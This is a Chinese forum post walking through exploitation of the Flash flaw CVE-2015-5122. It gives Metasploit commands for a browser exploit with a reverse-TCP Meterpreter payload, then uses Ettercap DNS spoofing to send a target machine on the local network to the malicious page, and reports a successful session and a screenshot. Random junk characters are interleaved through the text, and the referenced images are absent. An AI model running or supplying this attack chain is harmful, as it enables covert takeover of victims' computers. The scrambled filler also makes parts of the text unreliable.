cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

$ r0 f% d; l/ c* o 二、cve2015-5122漏洞实例演示虚拟机 / @; {- p! v g: `7 b: P1 f& x

J4 [: q' N* B; s1 K 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： * _" h0 {, \6 f# o1 {

, x. f( |& {- b- l3 h+ n8 C, t" Q search cve-2015-5122如图： ! g3 }1 f* A; A. T. ]- g* o

5 X1 F& g2 y6 B( p5 P / x% i0 L% y/ A0 y, D# L m

: _4 v7 I/ X# x5 a 下面我们敲如下命令： * ]( f1 i: l7 e

5 q% A# |# K9 _- T8 Y use exploit/multi/browser/adobe_flash_opaque_background_uaf ' H& K/ |" D- Y" W3 y3 q

/ {+ W2 A; E8 T% O4 U# {7 j set PAYLOAD windows/meterpreter/reverse_tcp 2 q! y2 ~1 j" d2 z0 v

. m" J+ _4 E/ l set LHOST 192.168.0.109 |" R' ?. l ~( z& p# ]) N/ L+ r8 b

: B" A! y, o) x8 z set URIPATH / /*根目录*/ * \8 Y+ U* F2 G+ U$ T

" E A O# e) J9 Q set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 & t8 s$ @) l9 M8 M0 x1 p

! M, r/ w1 n6 n8 q( s& D( b set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 $ }7 F' l1 Y, [$ Y7 C8 r

/ K- R( Q# ] Q3 B7 H 然后show options如图： , m# {5 x* `4 a5 B$ P

! m9 y. f& C8 f( ~& \4 \0 h 2 g* P) f8 Z; h$ Z

# ] ^: o* I, C 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
1 K: q K: G& e+ L : p( J) B( [7 A! G$ E

. z, M2 P5 I; A+ l3 A+ B 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 % t% f- Y# N7 O- f# Y) N; [

w% \( a6 B% y5 F/ |) ] Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 m1 k3 ]. |3 ^5 G8 d! V0 Z: M

$ [/ P4 E( v0 o( \/ z" t 4 s$ ^ s3 K8 G

& F8 E5 `- s5 W. u 成功了，这时候我们断开ettercap，如图： & F: L, r$ d( v3 P% V- o# e7 C- {/ \

7 E6 e# l7 n* z/ k: R- B . Z' @, a# E* E9 ^4 D; L q

) a1 F" v( I" I- [; H5 I& K0 a Screenshot如图： 7 j) m, j, n1 }: W& A# w& k

: A! G: W8 W/ q/ a/ Y* H! f ! P" l1 ]) O. S+ f8 e

! q: R6 H: W9 F. T3 c! n- s# N7 O, } , u% ] S( z$ i- S! e

		自动登录	找回密码
密码			立即注册